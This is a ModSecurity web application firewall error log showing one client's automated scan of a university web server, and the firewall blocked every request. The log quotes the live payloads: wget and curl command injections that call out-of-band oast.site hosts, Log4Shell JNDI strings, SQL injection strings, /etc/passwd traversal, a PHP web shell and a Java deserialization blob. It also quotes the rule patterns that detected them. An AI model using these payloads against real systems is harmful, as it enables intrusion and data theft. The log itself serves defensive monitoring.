"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAATovlsAAAAt"]
[Tue Aug 29 11:34:26.331353 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAULx6wAAABD"]
[Tue Aug 29 11:34:26.337205 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgfosyrohm59xgf.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUDQRcAAAA7"]
[Tue Aug 29 11:34:26.624834 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "digilibfeb.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11UsCo-f0AAAUB00cAAAA5"]
[Tue Aug 29 11:34:27.575272 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAATqf60AAAAu"]
[Tue Aug 29 11:34:29.325489 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAAUTiWUAAABJ"]
[Tue Aug 29 11:34:29.328210 2023] [:error] [pid 1228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgpdmnz4qt1tgxh.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAATMStUAAAAB"]
[Tue Aug 29 11:34:29.366691 2023] [:error] [pid 1233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATRZVcAAAAQ"]
[Tue Aug 29 11:34:29.508058 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgt6opjjad6i4ir.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VcCo-f0AAATqf7EAAAAu"]
[Tue Aug 29 11:34:30.387147 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgy9r1tdjejd845.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAAUXLhcAAABM"]
[Tue Aug 29 11:34:31.419637 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATmZcYAAAAr"]
[Tue Aug 29 11:34:32.321491 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAATOA88AAAAH"]
[Tue Aug 29 11:34:32.335234 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAARdiRkAAAAK"]
[Tue Aug 29 11:34:33.323975 2023] [:error] [pid 1279] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAT-IXsAAAA3"]
[Tue Aug 29 11:34:35.355811 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAUJIxgAAABB"]
[Tue Aug 29 11:34:37.311321 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAATVtR0AAAAZ"]
[Tue Aug 29 11:34:38.318783 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAATXLKwAAAAb"]
[Tue Aug 29 11:34:38.327606 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgcxgrswtfoewfs.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAAUMVMUAAABE"]
[Tue Aug 29 11:34:38.330658 2023] [:error] [pid 1233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgjz36an95ud7ty.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAATRZV4AAAAQ"]
[Tue Aug 29 11:34:41.331339 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAATovmoAAAAt"]
[Tue Aug 29 11:34:42.366732 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAATUxQYAAAAW"]
[Tue Aug 29 11:34:44.304776 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAUOaTYAAABG"]
[Tue Aug 29 11:34:49.308145 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAAQKOv0AAAAs"]
[Tue Aug 29 11:34:49.319653 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAATYeEYAAAAd"]
[Tue Aug 29 11:34:49.331449 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAUCJdcAAAA6"]
[Tue Aug 29 11:34:49.334681 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAAT@KvoAAAA2"]
[Tue Aug 29 11:34:51.573713 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAASEJXcAAAAE"]
[Tue Aug 29 11:34:52.321263 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAATSkngAAAAT"]
[Tue Aug 29 11:34:52.335229 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11bMCo-f0AAAUNakcAAABF"]
[Tue Aug 29 11:34:53.311803 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlg9m6wgyu7u4pzj.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAAUZcFkAAABO"]
[Tue Aug 29 11:34:53.341291 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAAVK0G0AAAAB"]
